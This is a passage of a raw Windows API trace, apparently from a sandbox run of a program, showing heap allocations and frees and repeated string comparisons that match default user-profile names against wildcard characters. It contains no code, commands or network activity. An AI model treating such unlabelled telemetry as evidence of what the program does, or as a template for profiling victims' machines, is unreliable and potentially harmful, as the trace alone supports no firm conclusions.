hHeap=0x650000, dwFlags=0x0, lpMem=0x6906b0 | out: hHeap=0x650000) returned 1 [0072.946] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d860 | out: hHeap=0x650000) returned 1 [0072.946] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d838 | out: hHeap=0x650000) returned 1 [0072.946] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906a0 | out: hHeap=0x650000) returned 1 [0072.946] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d810 | out: hHeap=0x650000) returned 1 [0072.946] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x692de8 | out: hHeap=0x650000) returned 1 [0072.946] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690660 | out: hHeap=0x650000) returned 1 [0072.946] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76afb8 | out: hHeap=0x650000) returned 1 [0072.946] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76afa0 | out: hHeap=0x650000) returned 1 [0072.946] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b000 | out: hHeap=0x650000) returned 1 [0072.946] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690880 | out: hHeap=0x650000) returned 1 [0072.946] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d8d8 | out: hHeap=0x650000) returned 1 [0072.946] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76aee0 | out: hHeap=0x650000) returned 1 [0072.946] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76afe8 | out: hHeap=0x650000) returned 1 [0072.946] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690680 | out: hHeap=0x650000) returned 1 [0072.946] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d900 | out: hHeap=0x650000) returned 1 [0072.946] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a940 | out: hHeap=0x650000) returned 1 [0072.946] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906f0 | out: hHeap=0x650000) returned 1 [0072.947] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690710 | out: hHeap=0x650000) returned 1 [0072.947] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906e0 | out: hHeap=0x650000) returned 1 [0072.947] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d798 | out: hHeap=0x650000) returned 1 [0072.947] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b138 | out: hHeap=0x650000) returned 1 [0072.947] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b018 | out: hHeap=0x650000) returned 1 [0072.947] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b1c8 | out: hHeap=0x650000) returned 1 [0072.947] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b198 | out: hHeap=0x650000) returned 1 [0072.947] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d7e8 | out: hHeap=0x650000) returned 1 [0072.947] PeekMessageW (in: lpMsg=0x61effc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61effc) returned 0 [0072.947] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6906e0 [0072.947] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d7e8 [0072.947] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b198 [0072.947] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690710 [0072.947] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b1c8 [0072.947] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690710 | out: hHeap=0x650000) returned 1 [0072.947] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b018 [0072.947] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690710 [0072.947] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690710 | out: hHeap=0x650000) returned 1 [0072.947] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xe2) returned 0x6b98e0 [0072.947] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690710 [0072.947] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b138 [0072.947] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b1c8 | out: hHeap=0x650000) returned 1 [0072.947] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b198 | out: hHeap=0x650000) returned 1 [0072.947] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b018 | out: hHeap=0x650000) returned 1 [0072.947] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d7e8 | out: hHeap=0x650000) returned 1 [0072.947] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906e0 | out: hHeap=0x650000) returned 1 [0072.947] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6b98e0 | out: hHeap=0x650000) returned 1 [0072.948] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690710 | out: hHeap=0x650000) returned 1 [0072.948] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b138 | out: hHeap=0x650000) returned 1 [0072.948] PeekMessageW (in: lpMsg=0x61effc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61effc) returned 0 [0072.948] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690710 [0072.948] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d7e8 [0072.948] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b138 [0072.948] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6906e0 [0072.948] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d798 [0072.948] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b018 [0072.948] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6906f0 [0072.948] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d900 [0072.948] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b198 [0072.948] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690680 [0072.948] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b1c8 [0072.948] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690680 | out: hHeap=0x650000) returned 1 [0072.948] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a940 [0072.948] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690680 [0072.948] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76afe8 [0072.948] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690680 | out: hHeap=0x650000) returned 1 [0072.948] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76aee0 [0072.948] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690680 [0072.948] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b000 [0072.948] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690680 | out: hHeap=0x650000) returned 1 [0072.948] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76afa0 [0072.948] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690680 [0072.948] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x64) returned 0x691be0 [0072.949] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4c) returned 0x6d33d0 [0072.949] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d8d8 [0072.949] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76afb8 [0072.949] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690880 [0072.949] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76afb8 | out: hHeap=0x650000) returned 1 [0072.949] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d810 [0072.949] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x76afb8 [0072.949] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76afa0 | out: hHeap=0x650000) returned 1 [0072.949] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x60) returned 0x75b1a0 [0072.949] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x5c) returned 0x75b208 [0072.949] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690660 [0072.949] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76afa0 [0072.949] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6906a0 [0072.949] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a8b0 [0072.949] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6906b0 [0072.949] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a8b0 | out: hHeap=0x650000) returned 1 [0072.949] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x60) returned 0x75b270 [0072.949] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x75b270 | out: hHeap=0x650000) returned 1 [0072.949] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906b0 | out: hHeap=0x650000) returned 1 [0072.949] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76afa0 | out: hHeap=0x650000) returned 1 [0072.949] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906a0 | out: hHeap=0x650000) returned 1 [0072.949] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76afa0 [0072.949] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76afb8 | out: hHeap=0x650000) returned 1 [0072.949] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x75b1a0 | out: hHeap=0x650000) returned 1 [0072.950] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690680 | out: hHeap=0x650000) returned 1 [0072.950] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b1c8 | out: hHeap=0x650000) returned 1 [0072.950] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b198 | out: hHeap=0x650000) returned 1 [0072.950] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76afe8 | out: hHeap=0x650000) returned 1 [0072.950] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a940 | out: hHeap=0x650000) returned 1 [0072.950] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b000 | out: hHeap=0x650000) returned 1 [0072.950] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76aee0 | out: hHeap=0x650000) returned 1 [0072.950] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d900 | out: hHeap=0x650000) returned 1 [0072.950] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906f0 | out: hHeap=0x650000) returned 1 [0072.950] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76aee0 [0072.950] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6906f0 [0072.950] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b000 [0072.950] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906f0 | out: hHeap=0x650000) returned 1 [0072.950] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a940 [0072.950] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6906f0 [0072.950] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76afe8 [0072.950] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906f0 | out: hHeap=0x650000) returned 1 [0072.950] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b198 [0072.950] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6906f0 [0072.950] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x5c) returned 0x75b1a0 [0072.950] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690680 [0072.950] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b1c8 [0072.950] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6906a0 [0072.950] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x5c) returned 0x75b270 [0072.950] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6906b0 [0072.950] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Default|Defaultuser|Defaultuser0|Default User", cchCount1=1, lpString2="?", cchCount2=1) returned 3 [0072.951] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="efault|Defaultuser|Defaultuser0|Default User", cchCount1=1, lpString2="?", cchCount2=1) returned 3 [0072.951] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="fault|Defaultuser|Defaultuser0|Default User", cchCount1=1, lpString2="?", cchCount2=1) returned 3 [0072.951] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ault|Defaultuser|Defaultuser0|Default User", cchCount1=1, lpString2="?", cchCount2=1) returned 3 [0072.951] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ult|Defaultuser|Defaultuser0|Default User", cchCount1=1, lpString2="?", cchCount2=1) returned 3 [0072.951] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lt|Defaultuser|Defaultuser0|Default User", cchCount1=1, lpString2="?", cchCount2=1) returned 3 [0072.951] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="t|Defaultuser|Defaultuser0|Default User", cchCount1=1, lpString2="?", cchCount2=1) returned 3 [0072.951] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="|Defaultuser|Defaultuser0|Default User", cchCount1=1, lpString2="?", cchCount2=1) returned 3 [0072.951] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Defaultuser|Defaultuser0|Default User", cchCount1=1, lpString2="?", cchCount2=1) returned 3 [0072.951] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="efaultuser|Defaultuser0|Default User", cchCount1=1, lpString2="?", cchCount2=1) returned 3 [0072.951] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="faultuser|Defaultuser0|Default User", cchCount1=1, lpString2="?", cchCount2=1) returned 3 [0072.951] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="aultuser|Defaultuser0|Default User", cchCount1=1, lpString2="?", cchCount2=1) returned 3 [0072.951] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ultuser|Defaultuser0|Default User", cchCount1=1, lpString2="?", cchCount2=1) returned 3 [0072.951] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ltuser|Defaultuser0|Default User", cchCount1=1, lpString2="?", cchCount2=1) returned 3 [0072.951] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tuser|Defaultuser0|Default User", cchCount1=1, lpString2="?", cchCount2=1) returned 3 [0072.951] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="user|Defaultuser0|Default User", cchCount1=1, lpString2="?", cchCount2=1) returned 3 [0072.951] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ser|Defaultuser0|Default User", cchCount1=1, lpString2="?", cchCount2=1) returned 3 [0072.951] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="er|Defaultuser0|Default User", cchCount1=1, lpString2="?", cchCount2=1) returned 3 [0072.951] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="r|Defaultuser0|Default User", cchCount1=1, lpString2="?", cchCount2=1) returned 3 [0072.951] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="|Defaultuser0|Default User", cchCount1=1, lpString2="?", cchCount2=1) returned 3 [0072.951] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Defaultuser0|Default User", cchCount1=1, lpString2="?", cchCount2=1) returned 3 [0072.951] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="efaultuser0|Default User", cchCount1=1, lpString2="?", cchCount2=1) returned 3 [0072.951] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="faultuser0|Default User", cchCount1=1, lpString2="?", cchCount2=1) returned 3 [0072.951] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="aultuser0|Default User", cchCount1=1, lpString2="?", cchCount2=1) returned 3 [0072.951] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ultuser0|Default User", cchCount1=1, lpString2="?", cchCount2=1) returned 3 [0072.951] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ltuser0|Default User", cchCount1=1, lpString2="?", cchCount2=1) returned 3 [0072.952] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tuser0|Default User", cchCount1=1, lpString2="?", cchCount2=1) returned 3 [0072.952] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="user0|Default User", cchCount1=1, lpString2="?", cchCount2=1) returned 3 [0072.952] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ser0|Default User", cchCount1=1, lpString2="?", cchCount2=1) returned 3 [0072.952] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="er0|Default User", cchCount1=1, lpString2="?", cchCount2=1) returned 3 [0072.952] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="r0|Default User", cchCount1=1, lpString2="?", cchCount2=1) returned 3 [0072.952] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0|Default User", cchCount1=1, lpString2="?", cchCount2=1) returned 3 [0072.952] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="|Default User", cchCount1=1, lpString2="?", cchCount2=1) returned 3 [0072.952] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Default User", cchCount1=1, lpString2="?", cchCount2=1) returned 3 [0072.952] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="efault User", cchCount1=1, lpString2="?", cchCount2=1) returned 3 [0072.952] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="fault User", cchCount1=1, lpString2="?", cchCount2=1) returned 3 [0072.952] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ault User", cchCount1=1, lpString2="?", cchCount2=1) returned 3 [0072.952] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ult User", cchCount1=1, lpString2="?", cchCount2=1) returned 3 [0072.952] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lt User", cchCount1=1, lpString2="?", cchCount2=1) returned 3 [0072.952] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="t User", cchCount1=1, lpString2="?", cchCount2=1) returned 3 [0072.952] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" User", cchCount1=1, lpString2="?", cchCount2=1) returned 1 [0072.952] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="User", cchCount1=1, lpString2="?", cchCount2=1) returned 3 [0072.952] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ser", cchCount1=1, lpString2="?", cchCount2=1) returned 3 [0072.952] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="er", cchCount1=1, lpString2="?", cchCount2=1) returned 3 [0072.952] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="r", cchCount1=1, lpString2="?", cchCount2=1) returned 3 [0072.952] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b1c8 | out: hHeap=0x650000) returned 1 [0072.952] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x60) returned 0x75b2d8 [0072.952] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x75b270 | out: hHeap=0x650000) returned 1 [0072.952] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906b0 | out: hHeap=0x650000) returned 1 [0072.952] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x75b2d8 | out: hHeap=0x650000) returned 1 [0072.952] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906a0 | out: hHeap=0x650000) returned 1 [0072.952] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b1c8 [0072.952] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b198 | out: hHeap=0x650000) returned 1 [0072.952] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906f0 | out: hHeap=0x650000) returned 1 [0072.953] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x75b208 | out: hHeap=0x650000) returned 1 [0072.953] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690660 | out: hHeap=0x650000) returned 1 [0072.953] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76afa0 | out: hHeap=0x650000) returned 1 [0072.953] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b018 | out: hHeap=0x650000) returned 1 [0072.953] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b000 | out: hHeap=0x650000) returned 1 [0072.953] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76aee0 | out: hHeap=0x650000) returned 1 [0072.953] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76afe8 | out: hHeap=0x650000) returned 1 [0072.953] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a940 | out: hHeap=0x650000) returned 1 [0072.953] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d798 | out: hHeap=0x650000) returned 1 [0072.953] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906e0 | out: hHeap=0x650000) returned 1 [0072.953] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a940 [0072.953] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6906e0 [0072.953] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76afe8 [0072.953] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906e0 | out: hHeap=0x650000) returned 1 [0072.953] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76aee0 [0072.953] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6906e0 [0072.953] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b000 [0072.953] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906e0 | out: hHeap=0x650000) returned 1 [0072.953] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b018 [0072.953] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6906e0 [0072.953] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x5c) returned 0x75b208 [0072.953] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690660 [0072.953] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76afa0 [0072.953] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6906f0 [0072.953] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x5c) returned 0x75b2d8 [0072.954] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6906a0 [0072.954] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Default|Defaultuser|Defaultuser0|Default User", cchCount1=1, lpString2="*", cchCount2=1) returned 3 [0072.954] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="efault|Defaultuser|Defaultuser0|Default User", cchCount1=1, lpString2="*", cchCount2=1) returned 3 [0072.954] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="fault|Defaultuser|Defaultuser0|Default User", cchCount1=1, lpString2="*", cchCount2=1) returned 3 [0072.954] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ault|Defaultuser|Defaultuser0|Default User", cchCount1=1, lpString2="*", cchCount2=1) returned 3 [0072.954] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ult|Defaultuser|Defaultuser0|Default User", cchCount1=1, lpString2="*", cchCount2=1) returned 3 [0072.954] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lt|Defaultuser|Defaultuser0|Default User", cchCount1=1, lpString2="*", cchCount2=1) returned 3 [0072.954] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="t|Defaultuser|Defaultuser0|Default User", cchCount1=1, lpString2="*", cchCount2=1) returned 3 [0072.954] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="|Defaultuser|Defaultuser0|Default User", cchCount1=1, lpString2="*", cchCount2=1) returned 3 [0072.954] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Defaultuser|Defaultuser0|Default User", cchCount1=1, lpString2="*", cchCount2=1) returned 3 [0072.954] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="efaultuser|Defaultuser0|Default User", cchCount1=1, lpString2="*", cchCount2=1) returned 3 [0072.954] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="faultuser|Defaultuser0|Default User", cchCount1=1, lpString2="*", cchCount2=1) returned 3 [0072.954] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="aultuser|Defaultuser0|Default User", cchCount1=1, lpString2="*", cchCount2=1) returned 3 [0072.954] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ultuser|Defaultuser0|Default User", cchCount1=1, lpString2="*", cchCount2=1) returned 3 [0072.954] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ltuser|Defaultuser0|Default User", cchCount1=1, lpString2="*", cchCount2=1) returned 3 [0072.954] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tuser|Defaultuser0|Default User", cchCount1=1, lpString2="*", cchCount2=1) returned 3 [0072.954] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="user|Defaultuser0|Default User", cchCount1=1, lpString2="*", cchCount2=1) returned 3 [0072.954] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ser|Defaultuser0|Default User", cchCount1=1, lpString2="*", cchCount2=1) returned 3 [0072.954] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="er|Defaultuser0|Default User", cchCount1=1, lpString2="*", cchCount2=1) returned 3 [0072.954] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="r|Defaultuser0|Default User", cchCount1=1, lpString2="*", cchCount2=1) returned 3 [0072.954] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="|Defaultuser0|Default User", cchCount1=1, lpString2="*", cchCount2=1) returned 3 [0072.954] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Defaultuser0|Default User", cchCount1=1, lpString2="*", cchCount2=1) returned 3 [0072.954] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="efaultuser0|Default User", cchCount1=1, lpString2="*", cchCount2=1) returned 3 [0072.954] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="faultuser0|Default User", cchCount1=1, lpString2="*", cchCount2=1) returned 3 [0072.954] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="aultuser0|Default User", cchCount1=1, lpString2="*", cchCount2=1) returned 3 [0072.954] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ultuser0|Default User", cchCount1=1, lpString2="*", cchCount2=1) returned 3 [0072.954] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ltuser0|Default User", cchCount1=1, lpString2="*", cchCount2=1) returned 3 [0072.955] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tuser0|Default User", cchCount1=1, lpString2="*", cchCount2=1) returned 3 [0072.955] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="user0|Default User", cchCount1=1, lpString2="*", 